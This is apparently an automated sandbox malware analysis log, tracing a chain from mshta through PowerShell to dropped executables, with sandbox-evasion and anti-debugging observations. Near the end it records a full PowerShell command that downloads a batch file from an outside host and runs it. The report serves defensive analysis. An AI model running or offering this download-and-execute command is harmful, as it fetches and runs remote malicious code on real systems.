Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Found API chain indicative of sandbox detection
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2951Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2679Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2465Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2579Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5046Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 539Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7594
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2005
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\msword\msword.exeJump to dropped file
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comAPI coverage: 4.2 %
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comAPI coverage: 3.9 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7512Thread sleep time: -5534023222112862s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7532Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7484Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7648Thread sleep count: 2465 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7648Thread sleep count: 2579 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7680Thread sleep time: -4611686018427385s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7692Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7628Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7704Thread sleep time: -3689348814741908s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7924Thread sleep count: 5046 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7928Thread sleep count: 539 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8116Thread sleep time: -12912720851596678s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7600Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7900Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7388Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7428Thread sleep count: 7594 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7920Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1720Thread sleep count: 2005 > 30
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com TID: 412Thread sleep time: -44000s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 16_2_004062D5 FindFirstFileW,FindClose,16_2_004062D5
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 16_2_00402E18 FindFirstFileW,16_2_00402E18
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 16_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,16_2_00406C9B
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0027A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,36_2_0027A087
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0027A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,36_2_0027A1E2
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0026E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,36_2_0026E472
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0027A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,36_2_0027A570
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0023C622 FindFirstFileExW,36_2_0023C622
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_002766DC FindFirstFileW,FindNextFileW,FindClose,36_2_002766DC
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_00277333 FindFirstFileW,FindClose,36_2_00277333
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_002773D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,36_2_002773D4
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0026D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,36_2_0026D921
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0026DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,36_2_0026DC54
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F4A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,38_2_00F4A087
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F4A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,38_2_00F4A1E2
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F3E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,38_2_00F3E472
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F4A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,38_2_00F4A570
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F466DC FindFirstFileW,FindNextFileW,FindClose,38_2_00F466DC
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F0C622 FindFirstFileExW,38_2_00F0C622
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F473D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,38_2_00F473D4
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F47333 FindFirstFileW,FindClose,38_2_00F47333
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F3D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,38_2_00F3D921
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F3DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,38_2_00F3DC54
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_00205FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,36_2_00205FC8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\mswordJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\msword\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: powershell.exe, 00000002.00000002.1697397744.000000000757C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0027F4FF BlockInput,36_2_0027F4FF
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0020338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,36_2_0020338B
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 16_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,16_2_004062FC
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_00225058 mov eax, dword ptr fs:[00000030h]36_2_00225058
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00EF5058 mov eax, dword ptr fs:[00000030h]38_2_00EF5058
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_002620AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,36_2_002620AA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_00232992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,36_2_00232992
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_00220BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,36_2_00220BAF
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_00220D45 SetUnhandledExceptionFilter,36_2_00220D45
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_00220F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,36_2_00220F91
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F02992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_00F02992
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00EF0BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_00EF0BAF
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00EF0D45 SetUnhandledExceptionFilter,38_2_00EF0D45
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00EF0F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,38_2_00EF0F91
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_00261B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,36_2_00261B4D
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0020338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,36_2_0020338B
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0026BBED SendInput,keybd_event,36_2_0026BBED
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0026EC6C mouse_event,36_2_0026EC6C
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:TEMP + '\c2.bat'; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -NoNewWindow"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c2.bat""Jump to behavior
